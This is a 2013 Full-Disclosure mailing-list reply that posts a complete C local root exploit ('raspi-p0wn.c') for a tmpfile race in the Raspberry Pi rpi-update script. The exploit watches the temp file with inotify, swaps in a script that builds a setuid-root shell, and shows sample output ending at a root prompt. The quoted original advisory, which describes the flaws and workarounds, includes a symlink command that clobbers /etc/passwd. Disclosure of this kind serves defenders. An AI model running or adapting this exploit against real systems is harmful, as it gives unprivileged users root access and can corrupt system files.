[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] rpi-update tmpfile vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] rpi-update tmpfile vulnerability
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Wed, 06 Mar 2013 02:25:27 +0000 (GMT)
<html><body><div><br>Hello everyone,<br><br>I took a closer look at this
vulnerability here is my exploit to
share:<br><br> 45 cat >
/tmp/updateScript.sh << EOF <-- if we own it first, wait for I_MODIFY
and inject our malicious
code<br> 46
#!/bin/bash<br> 47 if mv
"${_tempFileName}" "$0";
then<br> 48
rm --
"\$0"<br> 49
exec env UPDATE_SELF=0 /bin/bash "$0"
"${FW_REV}"<br> 50
else<br> 51
echo " !!!
Failed!"<br> 52
fi<br> 53 EOF<br> 54
<br> 55 echo " ***
Relaunching after update"
<br> 56 exec /bin/bash
/tmp/updateScript.sh <-- just runs whatever is here<br> <br><br>This
will poop out a root prompt for you!
<br><br>raspi-p0wn.c<br>----------------------------------------<br><br>/*Local
root exploit for rpi-update on raspberry Pi.<br>Vulnerability discovered by
Technion,
technion@xxxxxxxxxxx<br><br>https://github.com/Hexxeh/rpi-update/<br><br><br>larry@pih0le:~$
./rpix updateScript.sh<br>[*] Launching attack against
"updateScript.sh"<br>[+] Creating evil script (/tmp/evil)<br>[+] Creating
target file (/usr/bin/touch /tmp/updateScript.sh)<br>[+] Initialize inotify on
/tmp/updateScript.sh<br>[+] Waiting for root to change perms on
"updateScript.sh"<br>[+] Opening root shell (/tmp/sh)<br># <--
Yay!<br><br><br>Larry W.
Cashdollar<br>http://vapid.dhs.org<br>@_larry0<br><br>Greets to
Vladz.<br>*/<br><br>#include <stdlib.h><br>#include
<stdio.h><br>#include <unistd.h><br>#include
<sys/stat.h><br>#include <sys/types.h><br>#include
<string.h><br>#include <sys/inotify.h><br>#include
<fcntl.h><br>#include <sys/syscall.h><br><br>/*Create a small c
program to pop us a root shell*/<br>int create_nasty_shell(char *file)
{<br> char *s =
"#!/bin/bash\n"<br>
"echo
'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"<br>
"cc /tmp/sh.c -o /tmp/sh; chown root:root
/tmp/sh\n"<br>
"chmod 4755 /tmp/sh;\n";<br><br> int fd = open(file, O_CREAT|O_RDWR,
S_IRWXU|S_IRWXG|S_IRWXO);<br> write(fd, s, strlen(s));<br>
close(fd);<br><br> return 0;<br>}<br><br><br>int main(int argc, char
**argv) {<br> int fd, wd;<br> char buf[1], *targetpath,
*cmd,<br> *evilsh = "/tmp/evil", *trash =
"/tmp/trash";<br><br> if (argc < 2) {<br>
printf("Usage: %s <target file> \n", argv[0]);<br>
return 1;<br> }<br><br> printf("[*] Launching attack against
\"%s\"\n", argv[1]);<br><br> printf("[+] Creating evil script
(/tmp/evil)\n");<br> create_nasty_shell(evilsh);<br><br> targetpath
= malloc(sizeof(argv[1]) + 32);<br> cmd = malloc(sizeof(char) *
32);<br> sprintf(targetpath, "/tmp/%s", argv[1]);<br>
sprintf(cmd,"/usr/bin/touch %s",targetpath);<br> printf("[+] Creating
target file (%s)\n",cmd);<br> system(cmd);<br><br> printf("[+]
Initialize inotify on %s\n",targetpath);<br> fd =
inotify_init();<br> wd = inotify_add_watch(fd, targetpath,
IN_MODIFY);<br><br> printf("[+] Waiting for root to modify :\"%s\"\n",
argv[1]);<br> syscall(SYS_read, fd, buf, 1);<br>
syscall(SYS_rename, targetpath, trash);<br> syscall(SYS_rename,
evilsh, targetpath);<br><br> inotify_rm_watch(fd, wd);<br><br>
printf("[+] Opening root shell (/tmp/sh)\n");<br> sleep(2);<br>
system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");<br><br>
return 0;<br>}<br></div><div><br>On Feb 28, 2013, at 04:19 PM, Technion
<technion@xxxxxxxxxxx> wrote:<br><br><div><blockquote type="cite"><div
class="msg-quote"><div class="_stretch">Raspberry Pi Firmware Updater
Vulnerability<br> <br> Application:<br> <a
href="https://github.com/Hexxeh/rpi-update/";
data-mce-href="https://github.com/Hexxeh/rpi-update/";>https://github.com/Hexxeh/rpi-update/</a><br>
<br> Version Tested:<br> Github source as of 10ad1e975a (10th Feb commit)<br>
<br> Vulnerability #1:<br> A malicious user can clobber any file due to
insecure tmp file handling. <br> <br> Example:<br> <br> Any unprivileged user
can create the following symlink, either from <br> a shell account, or by
malicious web content such as PHP scripts.<br> pi@raspberrypi ~ $ ln -s
/etc/passwd /tmp/updateScript.sh<br> <br> Once in place, the symlink is
awaiting the administrator to run an update:<br> pi@raspberrypi ~ $ sudo
rpi-update<br> ...<br> pi@raspberrypi ~ $ cat /etc/passwd<br> #!/bin/bash<br>
if mv "./testfile.sh.tmp" "./testfile.sh"; then<br> rm -- "$0"<br> exec env
UPDATE_SELF=0 /bin/bash "./testfile.sh" ""<br> else<br> echo " !!! Failed!"<br>
fi<br> <br> As of this point, the pi is quite unusable due to the corrupted
password database.<br> Note that the attacker cannot customise the content, for
example, to set<br> a UID0 account.<br> <br> Vulnerability #2:<br> The
installation recommends the following command:<br> sudo wget <a
href="http://goo.gl/1BOfJ";
data-mce-href="http://goo.gl/1BOfJ";>http://goo.gl/1BOfJ</a> -O
/usr/bin/rpi-update && sudo chmod +x /usr/bin/rpi-update<br> <br>
Although the selfupdate functionality utilises SSL to ensure the integrity of
the download, the installation process uses a URL shortening service without
SSL to download the bash script, which the user is then encouraged to run as
the root user.<br> <br> Fix and Vendor Response<br> A pull request detailing
exploit #1 and including a simple patch was submitted February 6th. The patch
has not yet been accepted.<br> <br> Workaround<br> By running rpi-update with
the self update feature disabled, the affected code is not executed.
Example:<br> sudo UPDATE_SELF=0 rpi-update<br> <br> If you would like to update
the application manually, or perform an initial installation safely, use the
following commands:<br> wget <a
href="https://github.com/Hexxeh/rpi-update/raw/master/rpi-update";
data-mce-href="https://github.com/Hexxeh/rpi-update/raw/master/rpi-update";>https://github.com/Hexxeh/rpi-update/raw/master/rpi-update</a><br>
sudo cp rpi-update /usr/bin/rpi-update && sudo chmod +x
/usr/bin/rpi-update<br> <br> Note that applying the patch in my pull request
will not be a complete solution, as it will be reverted after the first
automatic update.<br> <br> <a href="mailto:technion@xxxxxxxxxxx";
data-mce-href="mailto:technion@xxxxxxxxxxx";>technion@xxxxxxxxxxx</a><br> <br>
<br></div></div></blockquote></div></div></body></html>_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/